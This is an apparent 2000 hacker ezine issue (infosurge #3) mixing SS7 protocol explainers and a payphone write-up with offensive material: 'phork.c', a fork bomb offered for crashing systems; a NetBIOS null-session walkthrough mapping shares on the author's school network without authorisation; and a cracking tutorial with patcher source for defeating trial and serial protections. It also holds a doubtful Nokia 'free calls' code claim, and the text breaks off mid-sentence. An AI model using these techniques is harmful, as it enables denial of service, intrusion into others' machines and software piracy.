_ __ (_)_ __ / _| ___ ___ _ _ _ __ __ _ ___ | | '_ \\\\| |_ / _ \\\\/ __| | | | '__/ _` |/ _ \\\\ | | | | | _| (_) \\\\__ \\\\ |_| | | | (_| | __/ |_|_| |_|_| \\\\___/|___/\\\\__,_|_| \\\\__, |\\\\___| |___/ .------------- ----------------. : Official Irc Channel -> #phreak/AustNET (irc.austnet.org): : Official Web Site -> http://infosurge.rendrag.net : : Official Submissions -> phase5@beergrave.net : : Official Fed -> m3 : : : : issue #3: 25/03/2000 : .__________________________________________________________. "New school tekniq with twice the wang of the nearest competitor" ............................[ Table Of Contents ]........................... [Intro ............................................................... phase5] [Editorial ........................................................... phase5] [Simple Nokia Trick ................................................ jacknife] [Multimedia Phones ................................................... jestar] [Advanced SS7 - The OSI Layers ....................................... phase5] [phork.c ............................................................ ghengis] [NetBios Penetration ............................................... PuManChu] [Advanced SS7 - Signaling Units ...................................... phase5] [Basic Cracking Tutorial ............................................. PSyOPS] [Schools and NT .................................................. Prosthetic] [JCE ................................................................. phunki] [Outro ............................................................. phase5] [Total ................................................. infosurge (68.9kb)] .................................[ shouts ]................................. [ Shard jestar lymco secroth ghengis sour insane hanz3r bsdave caddis ] [ insane MistaEckz assass|n Prosthetic Excalibur ^OpTiX^ tux galapogos01 ] [ wrath Niffum TheCzar TragicGod saboteur Rendrag VortexV void_ v64 ] [ PuManChu Deicidal phunki concat ] ........[ Editorial ].................................[ phase5 ]............ we're back again with yet another juarez packed issue. This issue was a bit later than the previous ones, and the following issues will probably follow suite. Hopefully you can expect infosurge issues to be released roughly monthly, though as things stand issues will most likely be every 1.5-2 months. We are still desparetly in need of articles. That was one of the reasons for the late release this time. As you can see from this issue, we accept articles on a wide variety of topics. This issue was put together a bit poorly and you can blame my laziness for that. There were also some mistakes in the past issues, regarding where the zine is hosted, etc. The email addy is 'phase5@beergrave.net' and the site is 'http://infosurge.rendrag.net'. Finally, send me some articles. ........[ Simple Nokia Trick ].......................[ jacknife ]........... Well you probably wonder how to put the odds in your favour and do something fancy with your phone, well ive looked into a few things after been told by another person about this simm code trick. This code has been discussed time and time again but this article is for those of you who dont know and besides that, hasnt been done in the info surge issues. Works on certain nokia mobile telephones, (5110 and most released around that same time), some new models do work by typing the code: *#746025625# in the standard menu, you will know if it has worked if the message "Sim Card Stop Allowed" Appears. Through my viewings of this, the following code is irreversable unless you connect it to your computer (the phone that is) and that it will either give Free Phonecalls, for about 3 mins (International & Local), or Give you extra battery life it does not however do anything that can cause you financial harm or problems etc (scamming). tid-bits: Another code is on nokias is *#06# which reveals your mobile Telephone serial code witch is unique with every mobile of course, and is how your carrier tracks you ........[ Multimedia Payphones ]......................[ jestar ]............ ___________________________ Background Info Some time last year I saw one of these for the first time at a local shopping centre and it immediately got my attention, it was sitting in a payphone stand but it was not like any payphone I'd seen before. It had a touch screen, and no keypad at all. The payphone stand had multimedia payphone on the top. So of course I got onto the phone and got stuck into looking around at what they could do.... heres the info. Also, those of you in that are anywhere other than Adelaide or Sydney will probably have to wait for a while to even see one of these phones as the are still in trial stages as far as i'm aware and the trial is only in the places i mentioned earlier. Oh, and the case numbers have K2 at the end of the number, that is why I am calling them K2 phones, that and the fact it is much easier than typing "multimedia payphone" everytime i want to refer to one. ___________________________ The Facts (aka stuff proved beyond doubt) I have managed to pick up some info on the tech specs of these phones. First thing to realise is that this is the *base* model, so newer phones may have more advanced technology inside them. Base model is a PC with 32 meg of ram and a 2.2gig hdd. Each phone has both a data line and a voice line running to the phone. At the moment the data line is a dialup modem, but the phones and cases have the facility to use either ISDN or cable data lines sometime in the future. A 12" colour touchscreen, which is used to navigate the various information services available on the payphone, and also used to dial numbers on the phones. The screen is 12mm thick. The computers that these phones are powered by run Windows NT 4.0 for their operating system. Each phone has a 112mm thermal printer, which is not actually used in any of the K2's I've seen, but is there for use with features yet to be implemented. They also contain stereo speakers, which have been turned up loud on some of the k2's i've been on while turned down on some others. Those are all the things that I have found out for sure about them. Now onto the speculations I have about them. _____________________________ Speculations Ok, I know these phones dial up. I have heard the normal modem dialing tones and then the handshake of a computer being connected. I am currently in the process of getting a recording of the number these phones dial into, and if anyone else can manage to get a recording and decode it I would like to hear from you to compare numbers. One thing for anyone who wants to try and get a recording, from what I can gather the phones dial in once first thing in the morning, and stay connected all day so consequently you will need to be the first one to use the phone for the day to get the recording. I assume that these phones are connected to some sort of telstra intranet, rather than than the actual internet, as they wouldnt want people to be able to connect to the payphone from their home computer. Also, the login/pass information would need to be stored on the payphone somewhere (that is assuming that the system is password protected and not set to accept all connections, and I am assuming this because I dont think telstra are that dense). Now, I dont know how connected this "intranet" would be to other telstra networks, but I would assume that all k2's would be on the same network, so it may be interesting non the less. Through messing around on one of these phones I managed to cause the web browser they use to crash due to java errors (no, I havent been able to recreate that) and this revealed to me that they run some form of Microsoft Internet Explorer, with java enabled. This probably opens up a load of possibilities for general phone buggery. ____________________________ In closing.. Well, I guess a lot of you are thinking "Well i'm going to flog one of these, tear it apart and really go to town" and believe me I would love to know what you find out if someone actually manages to do that, but theres a problem. These phones are only deployed in high traffic areas, and by high traffic areas I mean shopping centres, librarys, airports etc. That makes it nigh on impossible to even have a decent look at one let alone steal one without drawing attention to yourself. Other than that, you now know everything about these phones that I do, and also now know my theories on these phones. If you find out anything more I would really appreciate you mail me the info. ____________________________ Linkage Telstra Research Labs official page for these phones. http://www.telstra.com.au/research/h_multim.htm (c)2000 Jestar. ........[ Advanced SS7 - Signaling Units ]............[ phase5 ]............ . intro . what are signaling units / types of signaling units . message signaling unit . link status signaling unit . fill-in signaling unit . acronyms summary . outro . intro This article is kind of a follow-up to my article 'Introduction to SS7'. I would recommend that you read that first so that you have a basic overview of the SS7 signaling architecture. In this file, I will go a bit more in-depth with SS7. I will discuss the actual signals that are used in signaling, with some information on packet structure and types as well. . what are signaling units When signaling is done over SS7 it is done using signaling units. Signaling units are like messages that are sent back and forth over the signaling link. The SS7 protocol has 3 types of signaling units. These three are fill-in signaling units, message signaling units and link status signaling units. These three units make up the basis for all messages over SS7. . transmitting on SS7 All transmission happens using 8-bit bytes(octets). To seperate signaling units from each other there needs to be a way to tell when one signal ends and another begins. A unique bit pattern was devised for this purpose. It is referred to as the flag. Now typically, you would assume messages would go like this: start message end start message end start message end however with SS7 only one flag is used to signal both the end and start of messages. In this way transmission would look like: flag message flag message flag message flag whereby the flag would indicate end/start. Using this method one flag is used to indicate both a footer and a header in one. The flag used to indicate this is the pattern '01111110'. Obviously, this pattern could very easily crop up in a message, which would completely screw up transmissions. Therefore bit manipulation techniques are used so that a message does not contain this pattern. Once the message is received the bit manipulation is reversed and the message reconstructed. . message signaling unit This is where the work is really done. MSU's are used for basically every function of SS7. Because they do so much work, MSU's themselves are split up into several types. Before I explain about them however, I will show the basic packet structure of an MSU. The size of each segment is also specified. .----------------------------------------------------------------------------. | flag | BSN/BIB | FSN/FIB | Length | Service Info. | Signaling | Check | | | | | Indicator | Octet | Info. Field | Sum | `----------------------------------------------------------------------------' 1 octet 1 octet 1 octet 1 octet 1 octet 8-272 octets 1 octet I will do a quick run-down on each segment. flag - This has already been discussed above. Used to start/end SU's BSN/BIB & FSN/FIB These two segments go together. To make sure SU's are being received these two octets are used as verifiers. Whenever a SU is sent out a sequence number is given to it. This number is placed in the FSN/FIB segment. There are 7 bits assigned to the FSN. This can hold up to 128 unique values. Therefore there must be acknowledgement of receival at least every 128 messages. Until an SU is acknowledged, a copy is saved at the transmitter incase it needs to be resent. Once it has been acknowledged then that sequence number becomes available again. To acknowledge that it has successfully received an in-sequence packet the receiver will place the sequence number of the last packet that was acknowledged in the BSN. The FIB/BIB is used to specify if data-corruption has occured and to request a re-send. Length Indicator This is the number of octets between itself and the checksum. Only 6 of the 8 bits are used so only numbers up to 63 can be stored. Any MSU's with more than 63 octets are specified as 63. Service Information Octet This is basically a type identifier. It is split into two parts of 4 bits. The first part, the subservice field, contain the network indicator (national or international) and the priority (0-3, 0 is lowest, 3 is highest). Low priority messages may be discarded during congestion. Also, test messages have a higher priority than messages used for call setup. The second part is the service indicator(mtp,sccp,etc). Service Info. Field This is where the actual information is stored. The first 7 octets are the same for all MSU types. These contain information such as originator, destination, and which links to use. This 7 octet section is known as the routing label. It basically looks like this. .----------------------------------------------------------------------------. | destination point code | originating point code | signaling link selection | | | | | `----------------------------------------------------------------------------' 3 octets 3 octets 1 octet The destination point code (DPC) contains the address of where the message is to be sent to. The originating point code (OPC) contains the address of the source of the message. The signaling link selection (SLS) is used to the message is sent over currently unused links or an unused link from a mated pair. The rest of the data in this segment is the actual data that is being transmitted. . link status signaling unit First of all, I will show the basic structure of an LSSU packet. It is quite similiar to a MSU. .-----------------------------------------------------------------------. | flag | BSN/BIB | FSN/FIB | Length Indicator | Status Field | CheckSum | | | | | | | | `-----------------------------------------------------------------------' 1 octet 1 octet 1 octet 1 octet 1-2 octet(s) 1 octet As you can see this has most the basic components of a MSU. It is only missing the data segments. It does however, introduce another segment, the Status Field. A signaling link has two ends. These two ends are independant of each other. LSSU's are used as a way for one end to communicate with the other. LSSU's provide information such as the quality of received signaling traffic, the status of the two end points and other information about the signaling link. All this information is stored in the Status Field. You will notice that the LSSU does not have a Routing Label. This is because they are only transmitted between two points of a link. They do not need to be routed anywhere. Also the length indicator is either 1 or 2. . fill-in signaling unit As the name would suggest, these SU's are used to fill-in gaps in transmission. When no MSU's or LSSU's are being sent the FISU's are sent back and forth constantly. They are also useful for checking the link, while it is idle. A FISU packet still contains the basic components of other SU's because they are also acknowledged and such in the usual way. This forms yet another form of error checking, making sure packets are being correctly received. .--------------------------------------------------------. | flag | BSN/BIB | FSN/FIB | Length Indicator | CheckSum | | | | | | | `--------------------------------------------------------' 1 octet 1 octet 1 octet 1 octet 1 octet These packets contain no payload. The Length Indicator is always 0. The rest is standard to the SS7 generic packet structure. . acronyms summary Here is a list of the acronyms used in this text. BIB - backward indicator bit BSN - backward sequence number DPC - destination point code FIB - forward indicator bit FISU - fill-in signaling unit FSN - forward sequence number LSSU - link status signaling unit MSU - message signaling unit OPC - originating point code SLS - signaling links selection SS7 - signaling system 7 SU - signaling unit . outro That will probably be the last article on SS7 that I write in a while. By now you should understand the concept of signaling and packet-switching signaling networks (specifically SS7). If you have any comments, questions, etc regarding this article or SS7 in general than feel free to email me (phase5@beergrave.net). .eof. ........[ phork.c ]..................................[ ghengis ]............ /* * phork.c - * * description; * This tool will fork() the system and bring a system down too it's death * no programs or processes will be able to run, causing total chaos as * you can imagine. * *:--- * * usage; * * $ make phork * $ echo "HoHoHO, j00 g0Nna d13 b14TcH!"|wall ; ./phork & * *:--- * * werd; * crisen, phase5, pyro, tron, k, excalibur, insane, geewiz, sour, wrath * g^style, teek, xaviour, wewted, exo, niffum, lymco, xl, neekforce * *:--- * AustNET IRC, irc.austnet.org * #phreak, #leet, #unix, #ozsecurity, #neekfu *:--- * * Copyright (c) 2000, Skope Enterprise * */ #include int main() { printf("ph0rk by gh3ng15, n0w f0rk1ng th1s b14tch...\\\\n"); if (!fork()) { fork(); } main(); } ........[ NetBIOS Penetration ]......................[ PuManChu ]........... -__Introduction__- Here is an attempt by me to demonstrate the techniques and penetration of an NT machine or Network via NetBIOS. This is not meant for people who are new to security and will require some understanding of what i am talking about because i am not going through it every basic spec and i will be prone to skipping a few parts because it's a lot harder to put it into text than to actually perform the task. Anyway, i will continue. -__Discussion__- First you need to know how to use Nbtstat. I will show the results of query sessions and the penetration of the NT machine on my schools network. First thing you need to do is make a NBTSTAT query to the machine. C:\\\\>nbtstat -A 10.77.25.24 Name Type Status --------------------------------------------- NTBOX <00> UNIQUE Registered PUMANNETWORK <00> GROUP Registered NTBOX <00> UNIQUE Registered MAC Address = 00-00-00-00-00-00 Now from the result table above you can see 2 things. The machine name and the group it belongs to. The next step you would get from this is possible usernames or computer names to make a null IPC session. The IPC$ share is a standard hidden share on NT for server to server communication. Yet, we can use this to our advantage. To make a null IPC connection do this. C:\\\\>net use \\\\\\\\10.77.25.24\\\\ipc$ "" /user:"" If the connection is successful the user can do a number of things to get a current username list. But i wont go in depth into that. Now we can get what shares are available on the local machine as you would want to. It is accomplished like this. C:\\\\>net use \\\\\\\\10.77.25.24\\\\ipc$ "" /user:"" The command completed successfully. Then we do. C:\\\\>net view \\\\\\\\10.77.25.24 Shared resources at \\\\\\\\10.77.25.24 Share name Type Used as Comment ------------------------------------------------------------------------------- Accelerator Disk Agent Accelerator share for Seagate backup Inetpub Disk NETLOGON Disk Logon server share www_pages Disk The command completed successfully. Now as you can see, The shares werent available to view until the IPC connection was made. Now that you have a list of remote shares you can map to them. The mapping will only work if the shares are unpassworded or shared out to the 'Everyone' group. To map to the drive do as so: C:\\\\>net use g: \\\\\\\\10.77.25.24\\\\inetpub You will now have a g: and be able to connect to it freely as if it was a fixed disk on your computer. The vulnerability is widely overlooked in most schools and in some cases webserver and major networks. Below is a cut and paste of a MS-DOS session i had without any of my typing in between. This is to a normal slave machine, not a web server or anything with importance. ------------------------------Start Session---------------------------- C:\\\\>net view \\\\\\\\WSB61125 Shared resources at \\\\\\\\WSB61125 Share name Type Used as Comment ------------------------------------------------------------------------------- \\\\\\\\Users\\\\year_10\\\\y10share Disk \\\\\\\\Users\\\\year_10\\\\pek01 Disk The command completed successfully. C:\\\\>net use \\\\\\\\WSB61125\\\\ipc$ "" /pek01:"" The command completed successfully. C:\\\\>net view \\\\\\\\WSB61125 Shared resources at \\\\\\\\WSB61125 Share name Type Used as Comment ------------------------------------------------------------------------------- \\\\\\\\Users\\\\year_10\\\\y10share Disk \\\\\\\\Users\\\\year_10\\\\pek01 Disk The command completed successfully. C:\\\\>net use x: \\\\\\\\WSB61125\\\\Users\\\\year_10\\\\pek01 --------------------------------End Session---------------------------- With just that there i could access their user space and freely do what i wish. This is my school network. The setup is poor and passwords to be found anywhere are very rare. It is one very vulnerable network. Please dont decide to start bombing me with mail saying it doesnt work it wont do this, this doesnt work, you are full of crap. As i said above this is my attempt to demonstrate it. If it messed up in some parts im sorry, but it's a lot harder to put it in text than to do it. - Pu Man Chu - ........[ Advanced SS7 - Signaling Units ]............[ phase5 ]............ . intro . The Layers . Message Transfer Part . ISDN User Part . Signaling Connection Control Part . Transaction Capabilities Application Part . Operations, Maintenance and Administration Part . acronyms . outro . intro In this article I will go over the layers of SS7 in more detail. This will give you an understanding of how the whole network is put together. This will also touch on subjects discussed in 'Advanced SS7 - Signaling Units'. . The Layers There are varying amount of layers in SS7 depending on how you look at it. We will be looking at 5, which are the most common. Often these layers are combined to designate another layer (ie User and Application Part) * Message Transfer Part * ISDN User Part * Signaling Connection Control Part * Transactions Capabilites Application Part * Operations, Maintenance, and Administration Part . Message Transfer Part This section is made up of 3 protocol levels. It provides a service for the other parts and transfers messages(signaling units) to various parts of the network. Level 1 This is the Signaling Data Link. This is the physical part of the links, but not the endpoints. They are digital links transferring at 56kps or 64kps. Level 2 This is the Signaling Link. This is where signaling units are transfered. Transfer occurs using a binary protocol. This part is covered in more detail in 'Advanced SS7 - Signaling Units'. Level 3 This layer controls routing of messages. It includes network functions such as the routing label. It routes messages to their various destinations. Also, network management occurs here. It makes sure there is no congestion through effective link selection for routing, as well as passing link status to other signaling points. Also takes care of failed links, correcting errors and other reliability issues. . ISDN User Part The ISUP defines the protocol and procedures for call setup, management and termination over the PSTN. It handles both ISDN and non-ISDN calls. In my first SS7 article I showed a basic call example. That was ISUP. I did not show the messages sent in that example and I wont bother showing them here as they convey little information about SS7. Looking at the packet, the ISUP message format is carried in the SIF. It contains the standard routing label followed by the circuit identification code(CIC). This is then followed by the message type. . Signaling Connection Control Part This provides services about MTP. It allows messages to be sent to a specific application at a destination, where as a MTP only allows routing to a destination. The applications are reffered to as subsystems. SCCP is used as the transport for TCAP services. The SCCP type is stored in the SIF field of a MSU. It is one octet long. . Transactions Capabilites Application Part This is a set of services that use SCCP for transport. This provides extended features. Some examples are determining routing for 13 XX XX calls. These numbers automatically route to a local number. TCAP provides the queries between SSP and SCP. In an MSU, the TCAP message is in the SCCP portion. It has two parts, the Transaction Portion and the Component Portion. Transaction Portion This part contains the type identifier. There are seven types: Unidirectional: One direction only. There is no reply to this type. Query with Permission: Start a TCAP transaction where anyone can terminate. Query without Permission: Starts a TCAP transaction where origin can terminate. Response: End transaction Conversation with Permission: Continue transaction where anyone can terminate Conversation without Permission: Continue transaction where origin can terminate Abort: Self explanatory Component Portion There are 4 components. Invoke: Invokes an operation. Return Result: Returns the result of an invoked operation. Return Error: Reports a failed operation. Reject: Incorrect type or component. . Operations, Maintenance, and Administration Part OMAP is used for various things including: Routing data management, SCCP route verification and link failure management. It uses the connectionless services of TCAP. . acronyms CIC - circuit identification code ISUP - ISDN user part MSU - message signaling unit MTP - message transfer part OMAP - operations, maintenance, and administration part SCCP - signaling connection control part SS7 - signaling system 7 TCAP - transactions capabilites application part . outro I planned to make this my last file on SS7, however there may be another one or two to go over more specific details and to summarise all the components of SS7. If you have any questions about SS7 or this article feel free to mail me (phase5@beergrave.net) . eof . ........[ Basic Cracking Tutorial ]...................[ PSyOPS ]............ Welcome to a tutorial by Spyderco Psyops. This tutorial isn't - like almost everyone else - about one specific program. In this tutorial I will try to raise your skills as cracker. Just read, and if there is something you don't understand, then read it again. Most of the text we will fight us self through is for beginners, for the more skilled people, I refer to some of my tutorials on cracking java. This tutorial contains: [1] Basic of Win32Dasm [2] Basic of SmartCheck [3] Basic of Hiew [4] Basic of SoftICE [5] How to patch using Pascal [6] How to patch using ASM [7] FAQ [8] Good tools to have [9] Contacting Psyops [1]: Basic of Win32Dasm: ------------------------ Win32Dasm is one of the most forceful windows disassembles on the market. Normally its being used by programmers, but it can also be used to cracking, which I will try to teach you here. To disassembler a program, you simply need to open Dasm, press Disassembler, Open and choose your file. When its loaded, which probably take some time, next thing is to find the offset you need to change. Ordinarily you use Dasm if the programs protection is: Timelimit, serial fix, or Nag. Let's take an example. Timelimit, when the 30days trial period is over, you will get a text box saying that its expired and you can't use it anymore. In this example it says "Sorry, trial period is expired please register", to find this we look in Refs, String Data References (SDR). Here you can look after so called strings in the program. We found "Sorry, trial period is expired please register", and when we double click on it, we see this: * Possible StringData Ref from Data Obj ->"Sorry, trial period is expired please register" | :004041BA 6830834400 push 00448330 This we don't care about, but scroll up a bit till you come to the next, which in this case is: * Referenced by a (U)nconditional or (C)onditional Jump at address: |:00404158(C) We need 404158, now Shift F12 (Goto code location) and enter 404158. Usually you will get to a JE. This is what we need. Then double click on the JE so it turns green. Look at the buttom in Dasm, which will say: Line: xxxx Pg xx and xx of xxx Code Data @:xxxxxxxxx @Offset xxxxxxxxxh in File xxxxxxxx.exe Which will say: Line: "line" Pg "page" and "page" of "total" Code Data @:"Data Code" @Offset: "Offset" in File "File.exe" We concentrate on the offset, write it down or remember it. In this example the offset is: 4B5A. Now goto the Hiew section, on how to change the JE. [2] Basic of SmartCheck: ------------------------ Setup: It is very important that SC is set up right. So check this: First goto Program, then Settings where you should fill everything, next in the Settings push Reporting and fill out everything except Report MouseMove events from OCX controls. And you're ready to begin. How to open and run a program: First you goto File and push open, next you choose the file you want to run. When you get this press F5 to run the program. Asc: Normally when you're open a program with Name & Serial protection you will get the Asc for each character. With a protection with only Serial you should look in the box's right before you get the Error Message. [3] Basic of Hiew: ------------------ Opening a program in HIEW: Find Hiew.exe and run it, now you should stand in the directory called C:\\\\Directory of Hiew\\\\ Choose the program you want to crack/look in and push Enter. How to operate in Hiew: And the bottom line there will be a line with numbers like 1(Help) 2(Unwrap) And so on you should only concentrate at the 4(Mode), Now try to press F4 and you will see a dialog box come with the choices: Text, Hex and Decode. Normally when you have found the offset (look in my W32Dasm section) you will have to change it. To do this choose Decode, and all the functions below have changed, so now is F3 (Edit) and F5 (Goto) F7 (Search) And so on... If you already have the offset to change press F5 and enter the offset that you got, and you will land where you should. Now if you press F3 (Edit) you can change it, and if you now type F2 (in the Edit) you will see F2 (Asm). For a normal patch it should be something with a je that should be changed to jne. Now type F3 where you land after typing the offset, and simply write 75 (0F85) instead of 74 (0F84), now when your done push F9 (Update, Also Safe), And simply quit Hiew with F10 (Quit). Now run the program and if you have changed it right there should not be anymore. Ok, now we got that straight. Let's try an example. We found the offset (look in the Dasm section on how), and now we want to make changes. Our offset in this example is: 4B5A. Open Hiew press F9 (Open) find the program you want to change in and press Enter, Now your in Text mode, push Enter Twice to get in Decode section, Push F5 and enter the offset. Then we will land in something that looks like this: :0040415843 7443 JE or something like it. Now we change the 74(JE is also 84 sometimes) into a JNE. To do this you push F3 (edit) and simply change 74 to 75. Then push F9 (upload) and quit Hiew. Then you're done. [4] Basic of SoftICE: --------------------- Finally we got to the SoftICE section. First we need to configure Winice.dat. Here is my winice.dat for SoftICE 4.01 **** Cut from my Winice.dat **** PENTIUM=ON NMI=ON ECHOKEYS=OFF NOLEDS=OFF NOPAGE=OFF SIWVIDRANGE=ON THREADP=ON LOWERCASE=OFF WDMEXPORTS=OFF MONITOR=0 PHYSMB=128 SYM=1024 HST=256 TRA=8 MACROS=32 DRAWSIZE=2048 INIT="X;" F1="h;" F2="^wr;" F3="^src;" F4="^rs;" F5="^x;" F6="^ec;" F7="^here;" F8="^t;" F9="^bpx;" F10="^p;" F11="^G @SS:ESP;" F12="^p ret;" SF3="^format;" CF8="^XT;" CF9="TRACE OFF;" CF10="^XP;" CF11="SHOW B;" CF12="TRACE B;" AF1="^wr;" AF2="^wd;" AF3="^wc;" AF4="^ww;" AF5="CLS;" AF8="^XT R;" AF11="^dd dataaddr->0;" AF12="^dd dataaddr->4;" CF1="altscr off; lines 60; wc 32; wd 8;" CF2="^wr;^wd;^wc;" ; WINICE.DAT ; (SIW95\\\\WINICE.DAT) ; for use with SoftICE Versions greater than 3.0 (Windows 95) ; ; ************************************************************************* ; If your have MORE than 32MB of physical memory installed, change ; the PHYSMB line to the correct # of Megabytes. ; If you have LESS than 32MB you can save a bit of memory by ; specifying the correct # of Megabytes ; Example: PHYSMB=32 ; ************************************************************************* ; ***** Examples of sym files that can be included if you have the SDK ***** ; Change the path to the appropriate drive and directory ;LOAD=c:\\\\windows\\\\system\\\\user.exe ;LOAD=c:\\\\windows\\\\system\\\\gdi.exe ;LOAD=c:\\\\windows\\\\system\\\\krnl386.exe ;LOAD=c:\\\\windows\\\\system\\\\mmsystem.dll ;LOAD=c:\\\\windows\\\\system\\\\win386.exe ; ***** Examples of export symbols that can be included ***** ; Change the path to the appropriate drive and directory EXP=c:\\\\windows\\\\system\\\\vga.drv EXP=c:\\\\windows\\\\system\\\\vga.3gr EXP=c:\\\\windows\\\\system\\\\sound.drv EXP=c:\\\\windows\\\\system\\\\mouse.drv EXP=c:\\\\windows\\\\system\\\\netware.drv EXP=c:\\\\windows\\\\system\\\\system.drv EXP=c:\\\\windows\\\\system\\\\keyboard.drv EXP=c:\\\\windows\\\\system\\\\toolhelp.dll EXP=c:\\\\windows\\\\system\\\\shell.dll EXP=c:\\\\windows\\\\system\\\\commdlg.dll EXP=c:\\\\windows\\\\system\\\\olesvr.dll EXP=c:\\\\windows\\\\system\\\\olecli.dll EXP=c:\\\\windows\\\\system\\\\mmsystem.dll EXP=c:\\\\windows\\\\system\\\\winoldap.mod EXP=c:\\\\windows\\\\progman.exe EXP=c:\\\\windows\\\\drwatson.exe ; ***** Examples of export symbols that can be included for Windows 95 ***** ; Change the path to the appropriate drive and directory EXP=c:\\\\windows\\\\system\\\\kernel32.dll EXP=c:\\\\windows\\\\system\\\\user32.dll EXP=c:\\\\windows\\\\system\\\\gdi32.dll EXP=c:\\\\windows\\\\system\\\\comdlg32.dll EXP=c:\\\\windows\\\\system\\\\shell32.dll EXP=c:\\\\windows\\\\system\\\\advapi32.dll EXP=c:\\\\windows\\\\system\\\\shell232.dll EXP=c:\\\\windows\\\\system\\\\comctl32.dll EXP=c:\\\\windows\\\\system\\\\crtdll.dll EXP=c:\\\\windows\\\\system\\\\version.dll EXP=c:\\\\windows\\\\system\\\\netlib32.dll EXP=c:\\\\windows\\\\system\\\\msshrui.dll EXP=c:\\\\windows\\\\system\\\\msnet32.dll EXP=c:\\\\windows\\\\system\\\\mspwl32.dll EXP=c:\\\\windows\\\\system\\\\mpr.dll **** Cut from my Winice.dat **** Normally there is a ; before the EXP's like this: ;EXP=c:\\\\windows\\\\system\\\\mpr.dll ; means disabled, so if you don't delete those it will be the same as not having them. Afterwards you need to secure your Autoexec.bat is set-up right. Add this line in Autoexec.bat: c:\\\\pathtoSoftICE\\\\Winice.exe Restart and your ready to begin. When this is done open Loader32.exe, goto File, Open Module, then Module and Load. No need for that anymore, you can now execute SoftICE by pushing: Ctrl + D. In the programs we will use is the protection Name & Serial. Do not use Visual Basic programs with SoftICE, use SmartCheck for VB apps. These breaks a often used: GetWindowText / GetWindowTextA GetDlgItemText / GetDlgItemTextA These breakpoints are used in about 90% of all programs you will meet. Now lets go into SoftICE, Push Ctrl + D when you got your program running with registration box. Type BPX GetWindowTextA, And BPX GetDlgItemTextA Now push F5(Go). If you should get an error msg, you got Winice.dat wrong. Fill out the registration box and SoftICE should pup up. Type R to see Data and Registration Windows. Press F11 to trace the call. If you remember the functions below, you're on your way to the elite. F8 = Trace Into F10 = Trace Over F11 = Return ? EAX = Show EAX info D EAX = Show EAX info S 0 L XXXXXXXXXX "String" S 0 L XXXXXXXXXX XX,XX,XX,XX (XX = HEX) I think that was about the basic in SoftICE, for more questions mail me. [5] How to patch using Pascal: ------------------------------ Pascal is/was one of the most used tools to code the cracks in, many people still use Pascal. I.e. Crackers. That is why I want to teach you how to make a crack in Pascal. **** Source code to a 2 Byte Crack **** Programname PATCH; <- Put in the program name Uses Crt; <- It use Crt Const A: Array[1..1] of Record <- Description of Byte 1 A : Longint; B : Byte; End=((A:$XXXX;B:$XX)); <- A = Offset (Byte1), B = Byte (Byte1) C: Array[1..1] of Record <- Description of Byte 2 D : Longint; E : Byte; End=((D:$XXXX;E:$XX)); <- D = Offset D(Byte2), E = Byte(Byte2) Txt:array[0..3] of byte =($XX,$XX,$XX,$XX); <- Text in HEX Var Ch:Char; I:Byte; F:File; Size:Longint; { GemExitProc: Pointer;} begin Assign(F,'EHM.EXE'); <- Instead of EHM.EXE type in the filename to patch {$I-} Reset(F,1);{$I+} If IOResult <> 0 then begin writeln('Can Not find EHM.EXE'); <- This is saying if it isn't the right filesize halt(1); end; For I:=1 to 1 do <- Here we start Byte1 begin Seek(F,A[I].A); ch:=Char(A[I].B); Blockwrite(F,Ch,1); end; <- Ends byte1 For I:=1 to 1 do begin <- Starts byte2 Seek(F,C[I].D); ch:=Char(C[I].E); Blockwrite(F,Ch,1); end; <- Ends byte2 begin Seek(f,$XXXX); Blockwite(f,txt,4); end; Writeln('Patching Complete!'); <- What do say if complete patched end. **** Source code to a 2 Byte Crack **** Try to go through the code, and you will see that it isn't that hard to code a crack. If you still can't code, then get tHE EGOiSTE's patcher. [6] How to patch using ASM: --------------------------- ASM is with time getting bigger and bigger, the most crackers use ASM to code. My personal favourite is also ASM, if you want good coding then learn ASM, here is a little source to a crack coded in ASM. **** Source to a 1 byte crack in ASM **** ; - Original Code - ; DOSSEG .MODEL SMALL .STACK 500h .DATA .CODE PatchL EQU 6 Buffer Db PatchL Dup(1) handle dw ? intro db "Coded By YOU!",0dh,0ah,"Crack for "programname + version" Cracked By ME$" FileName db "PROGRAM.EXE",0 <- Put in the FileName. notfound db 0dh,0ah,"File not found!$" <- Shows when run wrong cracked db 0dh,0ah,"File Successfully patched. Enjoy!$" <- Shows when its done Cant db 0dh,0ah,"Can Not Write to File.$ <- Error message Done db "File has been made.$" String db 075h,0 <- "75" Byte to be patched START: mov ax,cs mov ds,ax dx,offset intro ;point to the time prompt mov ah,7 ;DOS:print string int 21h jmp openfile openfile: mov ax,cs mov ds,ax mov ax,3d02h mov dx,offset FileName int 21h mov handle,ax cmp ax,02h je filedontexist jmp write filedontexist: mov ax,cs mov ds,ax mov dx,offset notfound mov ah,9 ;DOS:print string int 21h ;display the time prompt jmp exit Write: mov bx,handle mov cx,0000h mov dx,3DCDh <- Offset "3DCD" mov ax,4200h int 21h mov cx,patchl mov dx,offset String mov ah,40h mov cx,01h int 21h mov ax,cs mov ds,ax mov dx,offset cracked mov ah,9 ;DOS:print string int 21h ;display the time prompt jmp Exit Exit: mov ah,3eh int 21h mov ax,4c00h int 21h END START **** Source to a 1 byte crack in ASM **** I hope you will read it through and try to understand it. I really hope you learned something in this code. If you want to be a good cracker, then my advise is: Learn ASM. [7] Friendly asked Questions: ----------------------------- I get some questions by mail, I hope to answer some of them here. Question: How do you find the offset in a program? Answer: That is one of the reasons I wrote this tutorial, if you just read and think at ones, then you will learn. Question: How can I contact you? Answer: By mail(see below). Question: Can you send me some cracking tools? Answer: Absolutely No! But you can get tools from www.protools.cjb.net. I hope you wont bug me for this anymore. [8] Good tools to have: ----------------------- Besides the most common tools like: SmartCheck, Win32Dasm, SoftICE and Hiew, there are a few goodies that you can use with cracking. ProcDump: is brand new type of tool that allows u to Dump, Unpack some Protected PE files without any need of debugger. PECRYPT32: is a Packer/Encrypter for Portable Executable Files Bye PE-Crypt: Decrypter for PECRYPT32 COGEN II: is a real easy patcher to make your cracks with. BreakICE: is a simple patch that will modify SoftICE so that you could set any kind of Breakpoints. Windows Commander 4.01: is a file manager for Windows, a tool like the Explorer or file manager, which comes with windows. Visual Basic: Easy tool to code your future programs in. C++: My favourite to program in. MASM: AN ASM Compiler. ASPatch: ASPack made its entrance in the shareware-scene. During that time it has grown to become one of the most popular .exe-packersSince its such a popular packer, and pretty hard to patch without some knowledge of ASM-programming, I've made this tool.. It is not capable of unpacking the files, but it makes it possible to patch them in memory after they've been unpacked, without using any loaders or standalone inmemory-patchers. This is accomplished by making a hook at 